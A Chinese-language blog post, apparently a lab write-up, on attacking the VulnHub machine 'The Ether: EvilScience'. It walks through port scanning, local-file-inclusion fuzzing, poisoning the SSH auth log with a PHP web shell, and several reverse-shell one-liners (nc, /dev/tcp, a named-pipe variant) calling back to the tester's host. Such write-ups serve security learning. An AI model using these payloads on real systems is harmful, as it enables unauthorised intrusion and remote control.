<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Bantian">





<title>VulnHub_The Ether:EvilScience靶机渗透之SSH日志包含 | Bantian</title>



    <link rel="icon" href="/my.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 4.2.1"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bantian&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Archives</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bantian&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Archives</a>
                
                    <a class="menu-item" href="/tags">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">VulnHub_The Ether:EvilScience靶机渗透之SSH日志包含</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Bantian</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">2020-07-07&nbsp;&nbsp;23:46:00</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p><img src="/2020/07/07/VulnHub_Evilscience/imgs/12.png" alt="12"></p>
<p>这是完成的第9个VulnHub靶机，这个靶机其实思路还是很简单的，就是这里的反弹shell比较难。</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>和以前一样，直接上nmap收集主机信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">kali@kali:~$ nmap -sP 192.168.247.1&#x2F;24</span><br><span class="line">Starting Nmap 7.80 ( https:&#x2F;&#x2F;nmap.org ) at 2020-07-06 10:18 EDT</span><br><span class="line">Nmap scan report for 192.168.247.1</span><br><span class="line">Host is up (0.00057s latency).</span><br><span class="line">Nmap scan report for 192.168.247.2</span><br><span class="line">Host is up (0.00040s latency).</span><br><span class="line">Nmap scan report for 192.168.247.210</span><br><span class="line">Host is up (0.00011s latency).</span><br><span class="line">Nmap scan report for 192.168.247.227</span><br><span class="line">Host is up (0.0011s latency).</span><br><span class="line">Nmap done: 256 IP addresses (4 hosts up) scanned in 2.57 seconds</span><br></pre></td></tr></table></figure>

<p>继续扫描开放的服务：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">kali@kali:~$ nmap -p1-65535 -A 192.168.247.227</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 10:23 EDT</span><br><span class="line">Nmap scan report for 192.168.247.227</span><br><span class="line">Host is up (0.0060s latency).</span><br><span class="line">Not shown: 65533 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)</span><br><span class="line">|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)</span><br><span class="line">|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.18 (Ubuntu)</span><br><span class="line">|_http-title: The Ether</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds</span><br></pre></td></tr></table></figure>

<p>发现了ssh服务和http服务。</p>
<h2 id="漏洞挖掘"><a href="#漏洞挖掘" class="headerlink" title="漏洞挖掘"></a>漏洞挖掘</h2><p>在chrome浏览器中访问目标站点：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/1.png" alt="1"></p>
<p>导航栏上有三个页面，在访问<code>research.php</code>时发现了潜在的文件包含点：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/2.png" alt="2"></p>
<p>但是直接包含<code>/etc/passwd</code>文件就失败了，没有任何回显，那么直接上burpsuite fuzz一下，用的字典是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;danielmiessler&#x2F;SecLists&#x2F;blob&#x2F;master&#x2F;Fuzzing&#x2F;LFI&#x2F;LFI-Jhaddix.txt</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/3.png" alt="3"></p>
<p>从fuzz结果可以看到，成功包含了三个文件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;var&#x2F;log&#x2F;lastlog</span><br><span class="line">&#x2F;var&#x2F;run&#x2F;utmp</span><br><span class="line">&#x2F;var&#x2F;log&#x2F;auth.log</span><br></pre></td></tr></table></figure>

<p>这三个文件的主要功能都是记录用户的登录信息。像<code>/var/log/auth.log</code>文件会记录系统的授权信息，包括用户登录和使用的权限机制等等。从上图可以看到<code>/var/log/auth.log</code>和SSH登录信息相关，所以我们可以尝试ssh登录，相关的内容都会被记录，比如尝试登录目标主机：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/5.png" alt="5"></p>
<p>登录失败了，然后查看文件<code>/var/log/auth.log</code>：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/4.png" alt="4"></p>
<p>可以看到ssh登录的日志信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Jul  6 07:50:38 theEther sshd[1804]: pam_unix(sshd:auth): authentication failure; logname&#x3D; uid&#x3D;0 euid&#x3D;0 tty&#x3D;ssh ruser&#x3D; rhost&#x3D;192.168.247.210  user&#x3D;root</span><br><span class="line">Jul  6 07:50:40 theEther sshd[1804]: Failed password for root from 192.168.247.210 port 34892 ssh2</span><br></pre></td></tr></table></figure>

<p>所以我们可以通过ssh日志文件包含入恶意的代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh &#39;&lt;?php system($_GET[&#39;cmd&#39;]);?&gt;&#39;@192.168.247.227</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/7.png" alt="7"></p>
<p>然后包含该文件并添加参数<code>cmd</code>：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file&#x3D;&#x2F;var&#x2F;log&#x2F;auth.log&amp;cmd&#x3D;id</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/8.png" alt="8"></p>
<p>命令被成功执行了，接着就可以反弹shell了。</p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.247.210 -e &#x2F;bin&#x2F;bash</span><br><span class="line">nc 192.168.247.210 -c &#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>

<p>觉得有点奇怪了，怎么<code>-e</code>或是<code>-c</code>都不管用，所以就用<code>man nc</code>看一下nc命令的手册，结果看到在目标主机上的nc为了安全起见是禁用了<code>-c</code>和<code>-e</code>选项的：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/9.png" alt="9"></p>
<p>然后尝试另一种反弹shell的方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.1168.247.210&#x2F;4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>但是也不行…因为这个是由解析shell的bash完成，在某些情况下不支持。</p>
<p>其实反弹shell的各种方法可以参考这篇文章，里面有很多反弹shell的姿势：</p>
<blockquote>
<p> <a href="https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html" target="_blank" rel="noopener">https://zerokeeper.com/experience/a-variety-of-environmental-rebound-shell-method.html</a> </p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mknod backpipe p &amp;&amp; nc 192.168.247.210 23333 0&lt;backpipe | &#x2F;bin&#x2F;bash 1&gt;backpipe</span><br><span class="line">&#x3D;&#x3D;&#x3D;&#x3D;&gt; </span><br><span class="line">mknod+backpipe+p+%26%26+nc+192.168.247.210+23333+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe</span><br></pre></td></tr></table></figure>

<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/11.png" alt="11"></p>
<p>终于反弹了shell，接着获取标准shell：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#39;import pty; pty.spawn(&quot;&#x2F;bin&#x2F;bash&quot;);&#39;</span><br></pre></td></tr></table></figure>

<p>发现当前目录下有一个具有suid执行权限的pyton脚本<code>xxxlogauditorxxx.py</code>：</p>
<p><img src="/2020/07/07/VulnHub_Evilscience/imgs/10.png" alt="10"></p>
<p>接下来就是一些常规的提权操作了，但是这里是利用靶机制作者自己制作好的一个python脚本，一般实战其实也不会有这种情况。而且我没想明白的是，不知道为什么反弹了一次shell之后，重新反弹shell就怎么也不成功了…所以后面的继续提权我就没完成了。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个靶机应该是做过的思路最直白简单的一个了，就是这里的反弹shell确实是比较难，到最后我也没太搞懂原因…为什么只能连接一次呢。。。</p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Bantian</span>
                    </p>
                
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>早睡早起身体好</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/Vulnhub/"># Vulnhub</a>
                    
                        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"># 渗透测试</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/07/08/%5BN1CTF2018%5Deating_cms/">N1CTF2018_eating_cms</a>
            
            
            <a class="next" rel="next" href="/2020/07/06/VulnHub_Ted/">VulnHub_Ted靶机渗透之Session文件包含</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Bantian | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
